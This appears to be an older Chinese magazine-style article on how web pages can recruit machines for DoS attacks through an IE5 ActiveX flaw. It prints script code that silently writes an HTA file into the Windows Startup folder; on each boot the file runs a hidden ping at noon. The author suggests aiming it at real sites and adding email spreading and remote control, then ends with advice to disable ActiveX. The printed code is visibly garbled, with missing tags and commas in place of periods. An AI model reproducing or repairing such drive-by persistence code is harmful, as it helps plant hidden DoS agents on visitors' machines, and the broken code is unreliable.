|
|
网页为DoS“布阵”
可能你早就听闻D0S(拒绝服务)攻击的大名,黑客们在自己的电脑上轻点鼠标,倾刻,一个大型网站被攻陷,颇有“谈笑间,樯橹灰飞烟灭”的周郎气概。但你可能并不十分清楚它们是如何“布阵”的。以原理上来讲,任何可制造大量“肉鸡”的分布“技术”都是D0S“布阵”的有效途径。
比如再普通不过的Web服务,作为D0S攻击的主战场,它同时也是D0S“布阵”和第一“前线”。Web服务存在的漏洞已经只能用系列来描述了,许多漏洞都可以为“布阵”利器。
在Win9X下,IE5可以利用生成或者覆盖本地文件的方法来执行本地计算机中的任意程序,这些问题出在ActiveX控件中。它允许控件执行生成和覆盖本地文凭,或者在任意文件中增删内容。那么一段利用这个漏洞的HTML就可以将一段包含有害代码的HTML Application File(*.hta)写入开始菜单里面“程序”中的“启动”组里,当用户再次启动机器(或者被强行重启),这个HTML Application(HTA,HTML应用程序)文件就会被执行。
大家都知道,HTA文件的权限比HTML文件要大很多,其威力接近EXE可执行文件。因此常见的病毒如“欢乐时光”等都没能放过它。如果能潜心“研制”,HTA还可以实现木马功能,像“网络神偷”一样,通过网页空间与控制者的通信。如果仅用来为已经计划好的D0S攻击“布阵”,做个定时器也是可行的。
例如下面这一段代码,如果加入到一个测试网页中,打开网页浏览一下,再看看“启动”组,效果怎么样?
object id=scr classid=clsid:06290BD5 -48AA -11D2 -8432 -006008C3FBFC
/object
SCRIPT
scr.Reset();
scr.Path =C:\\windows\\start Menu\\programs\\启动\\DoS.hta;
Scr.DoS=object id=’wsh’classid =’clsid:F935DC22 -1CF0 -11D0 -ADB9 -00C04FD58A0B’
/object
SCRIPT
today=newDate();
if(today.getHours()==12,wsh,Run(’ping -t 127.0.0.1’,0));
self.close();
/ +SCRIPT;
Scr,write();
/SCRIPT
/object
嘿,好家伙,毫不含糊地就把“启动”组占领了。手工启动程序或重新启动就会……什么?你说什么也没看见吗?哦,那你的机器真是太快了。你可能忘了看源代码,我也忘了告诉你了,这个HTA程序启动会自动关闭,wsh.run也是以隐藏的方式运行程序的。所以除非你突然有兴趣按“Ctrl+Alt+Del”来玩,说不定有机会发现这个一到12点钟就“拼命”的ping你自己的机器的程序(如果机器太破还可能会看到“一闪而过”)。
想想吧,如果这不是个测试页,而是一个日访问量上百万的大网站,如果它Ping的不是自己的机器而是指向某一个具体的网站,如果它不只是12点钟发作,如果还能通过E-mail传播,如果它再加入接收指令功能……你一定开始慌张了,为自己,也为整个网络安全,这种事情可能就会发生在你身上。
以上攻击手段是ActiveX系列漏洞的一个应用。还是我们那句说了百遍的话,要么把ActiveX scripting关掉,要么在访问不可信任的小网站,提示打开活动控件时,一定千万要小心,不要一不小心成为了DoS的“战争”工具。
|
|